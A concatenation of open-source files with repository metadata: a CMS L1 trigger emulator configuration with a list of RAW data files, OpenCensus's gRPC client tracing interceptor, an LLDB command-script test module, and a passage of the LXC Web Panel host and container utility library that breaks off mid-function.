'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2DC70C3-CC1C-DD11-8234-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C45BCFEF-BB1C-DD11-AF09-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C46CC141-C61C-DD11-9FDA-001617E30D52.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C4E9EB89-CC1C-DD11-AEC2-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C645C5B9-CE1C-DD11-BFD0-001617C3B78C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C65D8692-CC1C-DD11-B7B5-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C697C4F1-BD1C-DD11-8550-001617C3B66C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6DB2D95-CC1C-DD11-8C3F-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6E0A522-C21C-DD11-9C24-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6ED43E7-BB1C-DD11-8A18-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C80D9AEC-BB1C-DD11-8974-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C8335398-CC1C-DD11-A2D4-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C8E8C504-C01C-DD11-85C6-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA2218B6-D01C-DD11-979F-000423D6B42C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA368935-C21C-DD11-9788-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA3844EB-BD1C-DD11-913E-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA65A6FA-BF1C-DD11-8CC1-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CAB471E2-BD1C-DD11-9D4E-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CC12A30D-C01C-DD11-8A10-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CC8E9A1F-C21C-DD11-ADF9-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CE497BC3-D01C-DD11-928A-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CE6685CE-D01C-DD11-BE9B-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D01B6C02-BE1C-DD11-897C-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D06A2FCC-B91C-DD11-A9DA-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D221ABE5-BB1C-DD11-9DB3-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D28A8F02-C01C-DD11-9866-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D2B2FDB2-CE1C-DD11-8F56-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D47C0DE8-BD1C-DD11-9B8C-000423D94700.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D6D574D2-BB1C-DD11-981F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8776455-C81C-DD11-8D7F-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8B0FBB8-D01C-DD11-A27F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8FF2B18-C01C-DD11-9B55-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DA4A4889-CC1C-DD11-8A16-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DAD4298E-CA1C-DD11-A10E-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DAEE505E-C81C-DD11-980A-0019DB29C614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC13C55E-C81C-DD11-BAC1-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC1B6554-C61C-DD11-BF49-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC4E4EA8-CE1C-DD11-8FC3-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC709BFC-BF1C-DD11-A6B7-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DE27427E-CA1C-DD11-935C-000423D6CA02.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DE504FEB-BD1C-DD11-B7B8-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E06A7CF4-BB1C-DD11-9694-000423D94908.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E08DE8FC-BF1C-DD11-8C8E-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E0A9CA00-BE1C-DD11-9C4E-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E0DE281D-BE1C-DD11-8AA4-001617DBCF6A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E28F4E88-CA1C-DD11-AD78-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E2AC1367-C81C-DD11-9EA9-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E2D03EA8-CE1C-DD11-BEBD-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E41BC293-CC1C-DD11-8E24-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E438B3FA-BB1C-DD11-87A6-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E43E694A-C41C-DD11-B161-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E445BB2A-C21C-DD11-BFE6-0016177CA778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E451BF1C-C01C-DD11-8AB4-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E60810B4-CE1C-DD11-812E-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E8AFD30A-C01C-DD11-85A6-001617C3B778.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E8CECFF9-BF1C-DD11-B9C7-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EAC5E41D-C01C-DD11-8BE1-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EAF03AE7-BB1C-DD11-848C-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE214960-C81C-DD11-A182-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE4E914E-C41C-DD11-A095-001617C3B69C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE5A5200-BE1C-DD11-81C8-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EEAFA849-C41C-DD11-8203-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F0C47660-C81C-DD11-9107-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2075E91-CA1C-DD11-B1C4-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F207EC43-C61C-DD11-A230-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2300AB3-CE1C-DD11-A36B-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2716924-C21C-DD11-B757-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2790FCC-D01C-DD11-97CE-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F29E7046-C61C-DD11-862A-001617DBD472.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2CDC2D1-D21C-DD11-91F2-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F40BA1F2-BB1C-DD11-9148-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F45D0661-C81C-DD11-A2A2-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F4C05AC2-B91C-DD11-A0C5-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F684A2FE-BF1C-DD11-8C85-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F6D667DC-BB1C-DD11-8993-001617DBD224.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F877786C-C81C-DD11-9DBE-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F8EA1087-CA1C-DD11-BBC5-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FAB1D0DA-BB1C-DD11-BB67-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FC2172D3-D21C-DD11-B9FB-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FCAB7B9D-CA1C-DD11-942F-000423D986A8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FE771D08-BE1C-DD11-A65E-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FEB8AC4D-C61C-DD11-A404-001617C3B79A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FEB8DB1D-C21C-DD11-96E7-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FED38120-C21C-DD11-8253-001617C3B5D8.root']
# configuration
#
process.load("Configuration.StandardSequences.FakeConditions_cff")
process.load("Configuration.StandardSequences.GeometryDB_cff")
process.load("L1Trigger.Configuration.L1Config_cff")
# L1 menu
process.load("L1TriggerConfig.L1GtConfigProducers.Luminosity.lumi1x1032.L1Menu_CRUZET200805_gr7_muon_cff")
# RawToDigi all data
process.load("Configuration.StandardSequences.RawToDigi_Data_cff")
# Global Trigger emulator
import L1Trigger.GlobalTrigger.gtDigis_cfi
process.l1GtEmulDigis = L1Trigger.GlobalTrigger.gtDigis_cfi.gtDigis.clone()
# block GCT input and the technical triggers (only FDL and GMT active) 0x0101
process.l1GtParameters.DaqActiveBoards = 0x0105
# block GMT input (0xdd12)
#process.l1GtParameters.DaqActiveBoards = 0x00FF
# block both GCT and GMT (FDL and techTrig active)
#process.l1GtParameters.DaqActiveBoards = 0x0003
# input tag for GMT readout collection:
process.l1GtEmulDigis.GmtInputTag = 'gtDigis'
# input tag for GCT readout collections:
#process.l1GtEmulDigis.GctInputTag = 'gctDigis'
# logical flag to produce the L1 GT DAQ readout record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtDaqRecord = False
# logical flag to produce the L1 GT EVM readout record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtEvmRecord = False
# logical flag to produce the L1 GT object map record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtObjectMapRecord = False
# logical flag to write the PSB content in the L1 GT DAQ record
# if true, write the PSB content in the record (default)
#process.l1GtEmulDigis.WritePsbL1GtDaqRecord = False
# logical flag to read the technical trigger records
# if true, it will read via getMany the available records (default)
#process.l1GtEmulDigis.ReadTechnicalTriggerRecords = False
# number of "bunch crossing in the event" (BxInEvent) to be emulated
# symmetric around L1Accept (BxInEvent = 0):
# 1 (BxInEvent = 0); 3 (F 0 1) (standard record); 5 (E F 0 1 2) (debug record)
# even numbers (except 0) "rounded" to the nearest lower odd number
# negative value: emulate TotalBxInEvent as given in EventSetup
#process.l1GtEmulDigis.EmulateBxInEvent = 3
# Global Trigger report
import L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi
process.l1GtTrigReportData = L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi.l1GtTrigReport.clone()
process.l1GtTrigReportData.L1GtRecordInputTag = 'gtDigis'
#
import L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi
process.l1GtTrigReportEmul = L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi.l1GtTrigReport.clone()
process.l1GtTrigReportEmul.L1GtRecordInputTag = 'l1GtEmulDigis'
#
# compare the L1 GT data and emulator digis
process.load("L1Trigger.GlobalTriggerAnalyzer.l1GtDataEmulAnalyzer_cfi")
process.l1GtDataEmulAnalyzer.L1GtEmulInputTag = 'l1GtEmulDigis'
# path to be run
process.p = cms.Path(process.RawToDigi*process.l1GtEmulDigis*process.l1GtDataEmulAnalyzer*process.l1GtTrigReportData*process.l1GtTrigReportEmul)
# services
# Message Logger
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.enable = False
process.MessageLogger.cout = cms.untracked.PSet(
enable = cms.untracked.bool(True),
threshold = cms.untracked.string('INFO'),
INFO = cms.untracked.PSet(
#limit = cms.untracked.int32(-1)
limit = cms.untracked.int32(1000)
)#,
#threshold = cms.untracked.string('DEBUG'), ## DEBUG
#DEBUG = cms.untracked.PSet( ## DEBUG, all messages
#
# limit = cms.untracked.int32(-1)
#)
)
process.MessageLogger.debugModules = ['l1GtEmulDigis', 'l1GtDataEmulAnalyzer']
# histogram service
process.TFileService = cms.Service("TFileService",
fileName = cms.string('L1GtDataFromRawEmulAnalyzer.root')
)
# summary
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(True)
)
# output
process.outputL1GtDataEmul = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('testGt_DataFromRawEmulAnalyzer_output.root'),
outputCommands = cms.untracked.vstring('drop *',
'keep *_l1GtDataDigis_*_*',
'keep *_l1GtEmulDigis_*_*',
'keep *_l1GctDataDigis_*_*')
)
process.outpath = cms.EndPath(process.outputL1GtDataEmul)
|
cc4ac77ed4939c041e43e27a022c11153491a137
|
4e4b752c4dbecf0b0d9f7cb86f9f76bb0ffa5d32
|
/contrib/opencensus-ext-grpc/opencensus/ext/grpc/client_interceptor.py
|
288bf650b8f816dc5ea14ba6bc43cb06c29bc526
|
[
"Apache-2.0"
] |
permissive
|
census-instrumentation/opencensus-python
|
ab6bcf12b16677d9ca7fc93a5f96c2946d138a0c
|
3a2d8dfe1db4e0129dc691c35901a0d12127afc1
|
refs/heads/master
| 2023-09-02T13:53:19.757971
| 2023-03-16T22:10:07
| 2023-03-16T22:10:07
| 96,581,030
| 701
| 289
|
Apache-2.0
| 2023-09-14T21:14:09
| 2017-07-07T22:28:28
|
Python
|
UTF-8
|
Python
| false
| false
| 7,892
|
py
|
client_interceptor.py
|
# Copyright 2017, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import collections
import logging
import grpc
from opencensus.ext import grpc as oc_grpc
from opencensus.ext.grpc import utils as grpc_utils
from opencensus.trace import attributes_helper, execution_context
from opencensus.trace import span as span_module
from opencensus.trace import time_event
from opencensus.trace.propagation import binary_format
log = logging.getLogger(__name__)
ATTRIBUTE_COMPONENT = 'COMPONENT'
ATTRIBUTE_ERROR_NAME = 'ERROR_NAME'
ATTRIBUTE_ERROR_MESSAGE = 'ERROR_MESSAGE'
GRPC_HOST_PORT = 'GRPC_HOST_PORT'
GRPC_METHOD = 'GRPC_METHOD'
SENT_PREFIX = 'Sent'
TIMEOUT = 3
# Do not trace StackDriver Trace exporter activities to avoid deadlock.
CLOUD_TRACE = 'google.devtools.cloudtrace'
class _ClientCallDetails(
collections.namedtuple(
'_ClientCallDetails',
('method', 'timeout', 'metadata', 'credentials')),
grpc.ClientCallDetails):
pass
class OpenCensusClientInterceptor(grpc.UnaryUnaryClientInterceptor,
grpc.UnaryStreamClientInterceptor,
grpc.StreamUnaryClientInterceptor,
grpc.StreamStreamClientInterceptor):
def __init__(self, tracer=None, host_port=None):
self._tracer = tracer
self.host_port = host_port
self._propagator = binary_format.BinaryFormatPropagator()
@property
def tracer(self):
return self._tracer or execution_context.get_opencensus_tracer()
def _start_client_span(self, client_call_details):
span = self.tracer.start_span(
name=_get_span_name(client_call_details)
)
span.span_kind = span_module.SpanKind.CLIENT
# Add the component grpc to span attribute
self.tracer.add_attribute_to_current_span(
attribute_key=attributes_helper.COMMON_ATTRIBUTES.get(
ATTRIBUTE_COMPONENT),
attribute_value='grpc')
# Add the host:port info to span attribute
self.tracer.add_attribute_to_current_span(
attribute_key=attributes_helper.GRPC_ATTRIBUTES.get(
GRPC_HOST_PORT),
attribute_value=self.host_port)
# Add the method to span attribute
self.tracer.add_attribute_to_current_span(
attribute_key=attributes_helper.GRPC_ATTRIBUTES.get(GRPC_METHOD),
attribute_value=str(client_call_details.method))
return span
def _intercept_call(
self, client_call_details, request_iterator, grpc_type
):
metadata = ()
if client_call_details.metadata is not None:
metadata = client_call_details.metadata
# Start a span
current_span = self._start_client_span(client_call_details)
span_context = current_span.context_tracer.span_context
header = self._propagator.to_header(span_context)
grpc_trace_metadata = {
oc_grpc.GRPC_TRACE_KEY: header,
}
if isinstance(metadata, list):
metadata_to_append = list(six.iteritems(grpc_trace_metadata))
else:
metadata_to_append = tuple(six.iteritems(grpc_trace_metadata))
metadata = metadata + metadata_to_append
client_call_details = _ClientCallDetails(
client_call_details.method,
client_call_details.timeout,
metadata,
client_call_details.credentials)
request_iterator = grpc_utils.wrap_iter_with_message_events(
request_or_response_iter=request_iterator,
span=current_span,
message_event_type=time_event.Type.SENT
)
return client_call_details, request_iterator, current_span
def _callback(self, current_span):
def callback(future_response):
grpc_utils.add_message_event(
proto_message=future_response.result(),
span=current_span,
message_event_type=time_event.Type.RECEIVED,
)
self._trace_future_exception(future_response)
self.tracer.end_span()
return callback
def _trace_future_exception(self, response):
# Trace the exception for a grpc.Future if any
exception = response.exception()
if exception is not None:
exception = str(exception)
self.tracer.add_attribute_to_current_span(
attribute_key=attributes_helper.COMMON_ATTRIBUTES.get(
ATTRIBUTE_ERROR_MESSAGE),
attribute_value=exception)
def intercept_unary_unary(
self, continuation, client_call_details, request
):
if CLOUD_TRACE in client_call_details.method:
response = continuation(client_call_details, request)
return response
new_details, new_request, current_span = self._intercept_call(
client_call_details=client_call_details,
request_iterator=iter((request,)),
grpc_type=oc_grpc.UNARY_UNARY)
response = continuation(
new_details,
next(new_request))
response.add_done_callback(self._callback(current_span))
return response
def intercept_unary_stream(
self, continuation, client_call_details, request
):
if CLOUD_TRACE in client_call_details.method:
response = continuation(client_call_details, request)
return response
new_details, new_request_iterator, current_span = self._intercept_call(
client_call_details=client_call_details,
request_iterator=iter((request,)),
grpc_type=oc_grpc.UNARY_STREAM)
return grpc_utils.WrappedResponseIterator(
continuation(new_details, next(new_request_iterator)),
current_span)
def intercept_stream_unary(
self, continuation, client_call_details, request_iterator
):
if CLOUD_TRACE in client_call_details.method:
response = continuation(client_call_details, request_iterator)
return response
new_details, new_request_iterator, current_span = self._intercept_call(
client_call_details=client_call_details,
request_iterator=request_iterator,
grpc_type=oc_grpc.STREAM_UNARY)
response = continuation(
new_details,
new_request_iterator)
response.add_done_callback(self._callback(current_span))
return response
def intercept_stream_stream(
self, continuation, client_call_details, request_iterator
):
if CLOUD_TRACE in client_call_details.method:
response = continuation(client_call_details, request_iterator)
return response
new_details, new_request_iterator, current_span = self._intercept_call(
client_call_details=client_call_details,
request_iterator=request_iterator,
grpc_type=oc_grpc.STREAM_STREAM)
return grpc_utils.WrappedResponseIterator(
continuation(new_details, new_request_iterator), current_span)
def _get_span_name(client_call_details):
"""Generates a span name based off of the gRPC client call details"""
method_name = client_call_details.method[1:].replace('/', '.')
return '{}.{}'.format(SENT_PREFIX, method_name)
|
4b48032c72fcb49c29763eb725a7cb262efb4f26
|
4d28185e7a78a569f9a449f39f183cac3024f711
|
/packages/Python/lldbsuite/test/commands/command/script/import/foo/foo2.py
|
71657c299c219919a9e1b82ed4fbde338fb3e1b6
|
[
"NCSA",
"Apache-2.0",
"LLVM-exception"
] |
permissive
|
apple/swift-lldb
|
2789bf44f648609a1674ee520ac20b64c95de072
|
d74be846ef3e62de946df343e8c234bde93a8912
|
refs/heads/stable
| 2023-04-06T00:28:15.882479
| 2019-10-25T22:46:59
| 2019-10-25T22:46:59
| 44,838,862
| 780
| 291
|
Apache-2.0
| 2020-01-10T19:28:43
| 2015-10-23T21:13:18
|
C++
|
UTF-8
|
Python
| false
| false
| 294
|
py
|
foo2.py
|
from __future__ import print_function
def foo2_function(debugger, args, result, dict):
print("foo2 says " + args, file=result)
return None
def __lldb_init_module(debugger, session_dict):
debugger.HandleCommand("command script add -f foo2.foo2_function foo2cmd")
return None
|
5c12be7f373ce7e8b27b06bb33dcd0308dcd8403
|
1acbcda9259365865756e6fa559c4b56600e00dc
|
/lwp/__init__.py
|
0a2564e236b316c44b667a78f1bbcd8ac107c371
|
[
"MIT"
] |
permissive
|
lxc-webpanel/LXC-Web-Panel
|
a4ff2fcb99abd0b794526a650a2cd89bc625d849
|
262ac59b8a026cb01ff72a56278673c3fce9b9c0
|
refs/heads/0.2
| 2023-03-07T15:50:05.409894
| 2017-12-21T23:33:51
| 2017-12-21T23:33:51
| 8,950,398
| 441
| 211
|
MIT
| 2020-08-26T23:17:02
| 2013-03-22T11:17:26
|
Python
|
UTF-8
|
Python
| false
| false
| 13,884
|
py
|
__init__.py
|
# LXC Python Library
# for compatibility with LXC 0.8 and 0.9
# on Ubuntu 12.04/12.10/13.04
# Author: Elie Deloumeau
# Contact: elie@deloumeau.fr
# The MIT License (MIT)
# Copyright (c) 2013 Elie Deloumeau
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
sys.path.append('../')
from lxclite import exists, stopped, ContainerDoesntExists
import os
import platform
import re
import subprocess
import time
from io import StringIO
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
try:
import configparser
except ImportError:
import ConfigParser as configparser
class CalledProcessError(Exception):
pass
cgroup = {}
cgroup['type'] = 'lxc.network.type'
cgroup['link'] = 'lxc.network.link'
cgroup['flags'] = 'lxc.network.flags'
cgroup['hwaddr'] = 'lxc.network.hwaddr'
cgroup['rootfs'] = 'lxc.rootfs'
cgroup['utsname'] = 'lxc.utsname'
cgroup['arch'] = 'lxc.arch'
cgroup['ipv4'] = 'lxc.network.ipv4'
cgroup['memlimit'] = 'lxc.cgroup.memory.limit_in_bytes'
cgroup['swlimit'] = 'lxc.cgroup.memory.memsw.limit_in_bytes'
cgroup['cpus'] = 'lxc.cgroup.cpuset.cpus'
cgroup['shares'] = 'lxc.cgroup.cpu.shares'
cgroup['deny'] = 'lxc.cgroup.devices.deny'
cgroup['allow'] = 'lxc.cgroup.devices.allow'
def FakeSection(fp):
content = u"[DEFAULT]\n%s" % fp.read()
return StringIO(content)
def DelSection(filename=None):
if filename:
load = open(filename, 'r')
read = load.readlines()
load.close()
i = 0
while i < len(read):
if '[DEFAULT]' in read[i]:
del read[i]
break
load = open(filename, 'w')
load.writelines(read)
load.close()
def file_exist(filename):
'''
checks if a given file exist or not
'''
try:
with open(filename) as f:
f.close()
return True
except IOError:
return False
def ls_auto():
'''
returns a list of autostart containers
'''
try:
auto_list = os.listdir('/etc/lxc/auto/')
except OSError:
auto_list = []
return auto_list
def memory_usage(name):
'''
returns memory usage in MB
'''
if not exists(name):
raise ContainerDoesntExists(
"The container (%s) does not exist!" % name)
if name in stopped():
return 0
cmd = ['lxc-cgroup -n %s memory.usage_in_bytes' % name]
try:
out = subprocess.check_output(cmd, shell=True,
universal_newlines=True).splitlines()
except:
return 0
return int(out[0])/1024/1024
def host_memory_usage():
'''
returns a dict of host memory usage values
{'percent': int((used/total)*100),
'percent_cached':int((cached/total)*100),
'used': int(used/1024),
'total': int(total/1024)}
'''
out = open('/proc/meminfo')
for line in out:
if 'MemTotal:' == line.split()[0]:
split = line.split()
total = float(split[1])
if 'MemFree:' == line.split()[0]:
split = line.split()
free = float(split[1])
if 'Buffers:' == line.split()[0]:
split = line.split()
buffers = float(split[1])
if 'Cached:' == line.split()[0]:
split = line.split()
cached = float(split[1])
out.close()
used = (total - (free + buffers + cached))
return {'percent': int((used/total)*100),
'percent_cached': int(((cached)/total)*100),
'used': int(used/1024),
'total': int(total/1024)}
def host_cpu_percent():
'''
returns CPU usage in percent
'''
f = open('/proc/stat', 'r')
line = f.readlines()[0]
data = line.split()
previdle = float(data[4])
prevtotal = float(data[1]) + float(data[2]) + \
float(data[3]) + float(data[4])
f.close()
time.sleep(0.1)
f = open('/proc/stat', 'r')
line = f.readlines()[0]
data = line.split()
idle = float(data[4])
total = float(data[1]) + float(data[2]) + float(data[3]) + float(data[4])
f.close()
intervaltotal = total - prevtotal
percent = 100 * (intervaltotal - (idle - previdle)) / intervaltotal
return str('%.1f' % percent)
def host_disk_usage(partition=None):
'''
returns a dict of disk usage values
{'total': usage[1],
'used': usage[2],
'free': usage[3],
'percent': usage[4]}
'''
if not partition:
partition = '/'
usage = subprocess.check_output(['df -h %s' % partition],
universal_newlines=True,
shell=True).split('\n')[1].split()
return {'total': usage[1],
'used': usage[2],
'free': usage[3],
'percent': usage[4]}
def host_uptime():
'''
returns a dict of the system uptime
{'day': days,
'time': '%d:%02d' % (hours,minutes)}
'''
f = open('/proc/uptime')
uptime = int(f.readlines()[0].split('.')[0])
minutes = uptime / 60 % 60
hours = uptime / 60 / 60 % 24
days = uptime / 60 / 60 / 24
f.close()
return {'day': days,
'time': '%d:%02d' % (hours, minutes)}
def check_ubuntu():
'''
return the System version
'''
dist = '%s %s' % (platform.linux_distribution()[0],
platform.linux_distribution()[1])
return dist
def get_templates_list():
'''
returns a sorted lxc templates list
'''
templates = []
path = None
try:
path = os.listdir('/usr/share/lxc/templates')
except:
path = os.listdir('/usr/lib/lxc/templates')
if path:
for line in path:
templates.append(line.replace('lxc-', ''))
return sorted(templates)
def check_version():
'''
returns latest LWP version (dict with current and latest)
'''
f = open('version')
current = float(f.read())
f.close()
latest = float(urlopen('http://lxc-webpanel.github.com/version').read())
return {'current': current,
'latest': latest}
def get_net_settings_fname():
filename = '/etc/default/lxc-net'
if not file_exist(filename):
filename = '/etc/default/lxc'
if not file_exist(filename):
filename = None
return filename
def get_net_settings():
'''
returns a dict of all known settings for LXC networking
'''
filename = get_net_settings_fname()
if not filename:
return False
config = configparser.SafeConfigParser()
cfg = {}
config.readfp(FakeSection(open(filename)))
cfg['use'] = config.get('DEFAULT', 'USE_LXC_BRIDGE').strip('"')
cfg['bridge'] = config.get('DEFAULT', 'LXC_BRIDGE').strip('"')
cfg['address'] = config.get('DEFAULT', 'LXC_ADDR').strip('"')
cfg['netmask'] = config.get('DEFAULT', 'LXC_NETMASK').strip('"')
cfg['network'] = config.get('DEFAULT', 'LXC_NETWORK').strip('"')
cfg['range'] = config.get('DEFAULT', 'LXC_DHCP_RANGE').strip('"')
cfg['max'] = config.get('DEFAULT', 'LXC_DHCP_MAX').strip('"')
return cfg
def get_container_settings(name):
'''
returns a dict of all utils settings for a container
'''
if os.geteuid():
filename = os.path.expanduser('~/.local/share/lxc/%s/config' % name)
else:
filename = '/var/lib/lxc/%s/config' % name
if not file_exist(filename):
return False
config = configparser.SafeConfigParser()
cfg = {}
config.readfp(FakeSection(open(filename)))
try:
cfg['type'] = config.get('DEFAULT', cgroup['type'])
except configparser.NoOptionError:
cfg['type'] = ''
try:
cfg['link'] = config.get('DEFAULT', cgroup['link'])
except configparser.NoOptionError:
cfg['link'] = ''
try:
cfg['flags'] = config.get('DEFAULT', cgroup['flags'])
except configparser.NoOptionError:
cfg['flags'] = ''
try:
cfg['hwaddr'] = config.get('DEFAULT', cgroup['hwaddr'])
except configparser.NoOptionError:
cfg['hwaddr'] = ''
try:
cfg['rootfs'] = config.get('DEFAULT', cgroup['rootfs'])
except configparser.NoOptionError:
cfg['rootfs'] = ''
try:
cfg['utsname'] = config.get('DEFAULT', cgroup['utsname'])
except configparser.NoOptionError:
cfg['utsname'] = ''
try:
cfg['arch'] = config.get('DEFAULT', cgroup['arch'])
except configparser.NoOptionError:
cfg['arch'] = ''
try:
